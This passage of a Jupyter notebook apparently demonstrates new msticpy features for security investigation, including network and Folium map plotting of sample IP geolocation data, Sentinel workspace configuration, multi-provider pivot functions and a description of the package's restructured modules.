= 0;\n const timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "5766" } }, "output_type": "display_data" }, { "data": { "text/html": [ "
Figure(
id = '5766', …)
above = [],
align = 'start',
aspect_ratio = None,
aspect_scale = 1,
background = None,
background_fill_alpha = 1.0,
background_fill_color = '#ffffff',
below = [LinearAxis(id='5777', ...)],
border_fill_alpha = 1.0,
border_fill_color = '#ffffff',
center = [Grid(id='5780', ...), Grid(id='5784', ...), Label(id='5863', ...), Label(id='5864', ...), Label(id='5865', ...), Label(id='5866', ...), Label(id='5867', ...), Label(id='5868', ...), Label(id='5869', ...), Label(id='5870', ...), Label(id='5871', ...), Label(id='5872', ...), Label(id='5873', ...), Label(id='5874', ...), Label(id='5875', ...), Label(id='5876', ...), Label(id='5877', ...), Label(id='5878', ...), Label(id='5879', ...), Label(id='5880', ...), Label(id='5881', ...), Label(id='5882', ...), Label(id='5883', ...), Label(id='5884', ...), Label(id='5885', ...), Label(id='5886', ...), Label(id='5887', ...), Label(id='5888', ...), Label(id='5889', ...), Label(id='5890', ...), Label(id='5891', ...), Label(id='5892', ...), Label(id='5893', ...), Label(id='5894', ...), Label(id='5895', ...), Label(id='5896', ...), Label(id='5897', ...), Label(id='5898', ...), Label(id='5899', ...), Label(id='5900', ...), Label(id='5901', ...), Label(id='5902', ...), Label(id='5903', ...), Label(id='5904', ...), Label(id='5905', ...), Label(id='5906', ...), Label(id='5907', ...), Label(id='5908', ...), Label(id='5909', ...), Label(id='5910', ...), Label(id='5911', ...), Label(id='5912', ...), Label(id='5913', ...), Label(id='5914', ...), Label(id='5915', ...), Label(id='5916', ...), Label(id='5917', ...), Label(id='5918', ...), Label(id='5919', ...), Label(id='5920', ...), Label(id='5921', ...), Label(id='5922', ...), Label(id='5923', ...), Label(id='5924', ...), Label(id='5925', ...), Label(id='5926', ...), Label(id='5927', ...), Label(id='5928', ...), Label(id='5929', ...), Label(id='5930', ...), Label(id='5931', ...), Label(id='5932', ...)],
css_classes = [],
disabled = False,
extra_x_ranges = {},
extra_x_scales = {},
extra_y_ranges = {},
extra_y_scales = {},
frame_height = None,
frame_width = None,
height = 800,
height_policy = 'auto',
hidpi = True,
inner_height = 0,
inner_width = 0,
js_event_callbacks = {},
js_property_callbacks = {},
left = [LinearAxis(id='5781', ...)],
lod_factor = 10,
lod_interval = 300,
lod_threshold = 2000,
lod_timeout = 500,
margin = (0, 0, 0, 0),
match_aspect = False,
max_height = None,
max_width = None,
min_border = 5,
min_border_bottom = None,
min_border_left = None,
min_border_right = None,
min_border_top = None,
min_height = None,
min_width = None,
name = None,
outer_height = 0,
outer_width = 0,
outline_line_alpha = 1.0,
outline_line_cap = 'butt',
outline_line_color = '#e5e5e5',
outline_line_dash = [],
outline_line_dash_offset = 0,
outline_line_join = 'bevel',
outline_line_width = 1,
output_backend = 'canvas',
renderers = [GraphRenderer(id='5799', ...)],
reset_policy = 'standard',
right = [],
sizing_mode = None,
subscribed_events = [],
syncable = True,
tags = [],
title = Title(id='5767', ...),
title_location = 'above',
toolbar = Toolbar(id='5792', ...),
toolbar_location = 'right',
toolbar_sticky = True,
visible = True,
width = 800,
width_policy = 'auto',
x_range = Range1d(id='5769', ...),
x_scale = LinearScale(id='5773', ...),
y_range = Range1d(id='5771', ...),
y_scale = LinearScale(id='5775', ...))
\n", "\n" ], "text/plain": [ "Figure(id='5766', ...)" ] }, "execution_count": 105, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_df.mp_plot.network(\n", " source_col=\"SubjectUserName\",\n", " target_col=\"NewProcessName\",\n", " source_attrs=[\"SubjectDomainName\", \"SubjectLogonId\"],\n", " target_attrs=[\"CommandLine\", \"ParentProcessName\"],\n", " edge_attrs=[\"TimeGenerated\"],\n", " font_size=7,\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Folium Map\n", "\n", "Previous code\n", "\n", "```python\n", "# Create a IP Geolookup class\n", "iplocation = GeoLiteLookup()\n", "\n", "def format_ip_entity(row, ip_col):\n", " ip_entity = entities.IpAddress(Address=row[ip_col])\n", " iplocation.lookup_ip(ip_entity=ip_entity)\n", " ip_entity.AdditionalData[\"protocol\"] = row.L7Protocol\n", " if \"severity\" in row:\n", " ip_entity.AdditionalData[\"threat severity\"] = row[\"severity\"]\n", " if \"Details\" in row:\n", " ip_entity.AdditionalData[\"threat details\"] = row[\"Details\"]\n", " return ip_entity\n", "\n", "ips_out = list(selected_out.apply(lambda x: format_ip_entity(x, \"dest\"), axis=1))\n", "ips_in = list(selected_in.apply(lambda x: format_ip_entity(x, \"source\"), axis=1))\n", "ips_threats = list(ti_ip_results.apply(lambda x: format_ip_entity(x, \"Ioc\"), axis=1))\n", "\n", "icon_props = {\"color\": \"green\"}\n", "for ips in host_entity.public_ips:\n", " ips.AdditionalData[\"host\"] = host_entity.HostName\n", "folium_map.add_ip_cluster(ip_entities=host_entity.public_ips, **icon_props)\n", "icon_props = {\"color\": \"blue\"}\n", "folium_map.add_ip_cluster(ip_entities=ips_out, **icon_props)\n", "icon_props = {\"color\": \"purple\"}\n", "folium_map.add_ip_cluster(ip_entities=ips_in, **icon_props)\n", "icon_props = {\"color\": \"red\"}\n", "folium_map.add_ip_cluster(ip_entities=ips_threats, **icon_props)\n", "\n", "display(folium_map)\n", "```\n", "\n", "### New code" ] }, { "cell_type": "code", "execution_count": 106, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
AllExtIPsCountryCodeCountryNameStateCityLongitudeLatitudeAsnedgesTypeAdditionalDataIpAddress
065.55.44.109USUnited StatesVirginiaBoydton-78.375036.6534NaNset()geolocation{}65.55.44.109
113.71.172.128CACanadaOntarioToronto-79.419543.6644NaNset()geolocation{}13.71.172.128
213.71.172.130CACanadaOntarioToronto-79.419543.6644NaNset()geolocation{}13.71.172.130
340.124.45.19USUnited StatesTexasSan Antonio-98.492629.4221NaNset()geolocation{}40.124.45.19
4104.43.212.12USUnited StatesIowaDes Moines-93.612741.6015NaNset()geolocation{}104.43.212.12
\n", "
" ], "text/plain": [ " AllExtIPs CountryCode CountryName State City Longitude \\\n", "0 65.55.44.109 US United States Virginia Boydton -78.3750 \n", "1 13.71.172.128 CA Canada Ontario Toronto -79.4195 \n", "2 13.71.172.130 CA Canada Ontario Toronto -79.4195 \n", "3 40.124.45.19 US United States Texas San Antonio -98.4926 \n", "4 104.43.212.12 US United States Iowa Des Moines -93.6127 \n", "\n", " Latitude Asn edges Type AdditionalData IpAddress \n", "0 36.6534 NaN set() geolocation {} 65.55.44.109 \n", "1 43.6644 NaN set() geolocation {} 13.71.172.128 \n", "2 43.6644 NaN set() geolocation {} 13.71.172.130 \n", "3 29.4221 NaN set() geolocation {} 40.124.45.19 \n", "4 41.6015 NaN set() geolocation {} 104.43.212.12 " ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "# read in a DataFrame from a csv file\n", "geo_loc_df = (\n", " pd\n", " .read_csv(\"data/ip_locs.csv\", index_col=0)\n", " .dropna(subset=[\"Latitude\", \"Longitude\", \"IpAddress\"]) # We need to remove an NaN values\n", ")\n", " \n", "display(geo_loc_df.head(5))\n" ] }, { "cell_type": "code", "execution_count": 107, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
Make this Notebook Trusted to load map: File -> Trust Notebook
" ], "text/plain": [ "" ] }, "execution_count": 107, "metadata": {}, "output_type": "execute_result" } ], "source": [ "\n", "geo_loc_df.mp_plot.folium_map(ip_column=\"IpAddress\")" ] }, { "cell_type": "code", "execution_count": 108, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
Make this Notebook Trusted to load map: File -> Trust Notebook
" ], "text/plain": [ "" ] }, "execution_count": 108, "metadata": {}, "output_type": "execute_result" } ], "source": [ "geo_loc_df.mp_plot.folium_map(\n", " lat_column=\"Latitude\", long_column=\"Longitude\", zoom_start=10\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### More complex data to display" ] }, { "cell_type": "code", "execution_count": 109, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
AllExtIPsCountryCodeCountryNameStateCityLongitudeLatitudeAsnedgesTypeAdditionalDataIpAddressStatusFriendlinessFlavorSpiceLevel
065.55.44.109USUnited StatesVirginiaBoydton-78.375036.6534NaNset()geolocation{}65.55.44.109HomeWarmChocolate1.0
113.71.172.128CACanadaOntarioToronto-79.419543.6644NaNset()geolocation{}13.71.172.128OfficeColdCinnamon2.0
213.71.172.130CACanadaOntarioToronto-79.419543.6644NaNset()geolocation{}13.71.172.130VacationMediumMango3.0
\n", "
" ], "text/plain": [ " AllExtIPs CountryCode CountryName State City Longitude \\\n", "0 65.55.44.109 US United States Virginia Boydton -78.3750 \n", "1 13.71.172.128 CA Canada Ontario Toronto -79.4195 \n", "2 13.71.172.130 CA Canada Ontario Toronto -79.4195 \n", "\n", " Latitude Asn edges Type AdditionalData IpAddress Status \\\n", "0 36.6534 NaN set() geolocation {} 65.55.44.109 Home \n", "1 43.6644 NaN set() geolocation {} 13.71.172.128 Office \n", "2 43.6644 NaN set() geolocation {} 13.71.172.130 Vacation \n", "\n", " Friendliness Flavor SpiceLevel \n", "0 Warm Chocolate 1.0 \n", "1 Cold Cinnamon 2.0 \n", "2 Medium Mango 3.0 " ] }, "execution_count": 109, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Create some data to display\n", "data_df = pd.DataFrame({\n", " \"Status\": [\"Home\", \"Office\", \"Vacation\"] * (len(geo_loc_df) // 3),\n", " \"Friendliness\": [\"Warm\", \"Cold\", \"Medium\"] * (len(geo_loc_df) // 3),\n", " \"Flavor\": [\"Chocolate\", \"Cinnamon\", \"Mango\"] * (len(geo_loc_df) // 3),\n", " \"SpiceLevel\": [1, 2, 3] * (len(geo_loc_df) // 3)\n", "})\n", "geo_loc_data_df = pd.concat([geo_loc_df, data_df], axis=1).dropna(subset=[\"IpAddress\"])\n", "geo_loc_data_df.head(3)" ] }, { "cell_type": "code", "execution_count": 110, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
Make this Notebook Trusted to load map: File -> Trust Notebook
" ], "text/plain": [ "" ] }, "execution_count": 110, "metadata": {}, "output_type": "execute_result" } ], "source": [ "geo_loc_data_df.mp_plot.folium_map(\n", " ip_column=\"IpAddress\",\n", " layer_column=\"CountryName\",\n", " tooltip_columns=[\"Status\", \"Flavor\"],\n", " popup_columns=[\"Friendliness\", \"SpiceLevel\", \"Status\", \"Flavor\"],\n", " zoom_start=2,\n", ")" ] }, { "cell_type": "code", "execution_count": 111, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
Make this Notebook Trusted to load map: File -> Trust Notebook
" ], "text/plain": [ "" ] }, "execution_count": 111, "metadata": {}, "output_type": "execute_result" } ], "source": [ "icon_map = {\n", " \"US\": {\n", " \"color\": \"green\",\n", " \"icon\": \"flash\",\n", " },\n", " \"GB\": {\n", " \"color\": \"purple\",\n", " \"icon\": \"flash\",\n", " },\n", " \"default\": {\n", " \"color\": \"blue\",\n", " \"icon\": \"info-sign\",\n", " },\n", "}\n", "\n", "geo_loc_df.mp_plot.folium_map(\n", " ip_column=\"AllExtIPs\",\n", " icon_column=\"CountryCode\",\n", " icon_map=icon_map,\n", " zoom_start=2,\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Sentinel Workspace Configuration" ] }, { "cell_type": "code", "execution_count": 112, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "b3b55d6c069f4eeeb167b16e2db8b898", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Label(value='Loading. Please wait.')" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "a4b01d0a47ad4adaad841711385336ee", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(Tab(children=(VBox(children=(Label(value='Microsoft Sentinel workspace settings'), HBox(childre…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "mp.MpConfigEdit()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Pivot Support for multiple providers\n", "\n", "- No need to import or initialize Pivot\n", "- Cleaned up TI pivots\n", "- Removed conflicting \"shortcut\" data query functions\n", "- Data-provider pivot functions added dynamically on \"connect\"" ] }, { "cell_type": "code", "execution_count": 113, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "2cebd114548a4c02a3243c9c025afcec", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(HBox(children=(VBox(children=(HTML(value='Entities'), Select(description='entity', layou…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "mp.pivot.browse()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "qry_prov = mp.QueryProvider(\"MSSentinel\")\n", "qry_prov2 = mp.QueryProvider(\"MSSentinel\")\n", "\n", "qry_prov.connect(workspace=\"Default\")" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "mp.pivot.browse()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "qry_prov.connect(workspace=\"CyberSecuritySOC\")" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "mp.pivot.browse()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [ "qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.wevt_logons()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Pivot settings\n", "\n", "- UseV1QueryNames - use query naming pattern used in V1\n", "- UseQueryFamily - use the \"DataFamily\" name defined in the query template\n", " rather than the table name (or shortened mnemonic)\n", " ```python\n", " qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.wevt_logons()\n", " # with UseQueryFamily: True\n", " qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.WindowsSecurity_logons()\n", " ```\n", "- UseQueryProviderTimeSpans - by default, all query providers use the pivot timespan\n", " ```python\n", " mp.pivot.timespan\n", " ```\n", " Setting this to True lets queries from different providers use the timespans\n", " set for each provider.\n", "\n", "\n", "```yaml\n", " ....\n", " Pivots:\n", " UseV1QueryNames: False\n", " UseQueryFamily: False\n", " UseQueryProviderTimeSpans: False\n", "\n", "```" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Restructure" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "\n", "| folder | description | previously |\n", "|-----------|----------------------------------------------------------------------------------|--------------------|\n", "| analysis | Data analysis functions - timeseries, anomalies, clustering | analysis |\n", "| auth | authentication and secrets management | common |\n", "| common | common used utilities and definitions (e.g. exceptions) | - |\n", "| config | configuration and settings | - |\n", "| context | enrichment modules some modules may need subfolders - e.g. tiproviders, vtlookup | sectools |\n", "| data | data acquisition/queries (most Azure/Sentinel funcs moved to context) | - |\n", "| datamodel | entities, soc, pivot core functions | - |\n", "| init | package loading and initialization - nbinit, pivot creation modules | nbtools, datamodel |\n", "| transform | simple data processing - decoding, reformatting, schema change, process tree | sectools |\n", "| vis | visualization modules including browsers | nbtools |\n", "| nbwidgets | nb widgets modules | nbtools/nbwidgets |\n", "\n", "`sectools` and `nbtools` still exist but are mostly redirector modules.\n", "E.g.\n", "```python\n", "from msticpy.sectools.geoip import GeoLiteLookup\n", "```\n", "still works but has a deprecation warning." ] } ], "metadata": { "kernelspec": { "display_name": "Python 3.9.7 ('msticpy')", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.9.7" }, "orig_nbformat": 4, "vscode": { "interpreter": { "hash": "0f1a8e166ce5c1ec1911a36e4fdbd34b2f623e2a3442791008b8ac429a1d6070" } } }, "nbformat": 4, "nbformat_minor": 2 }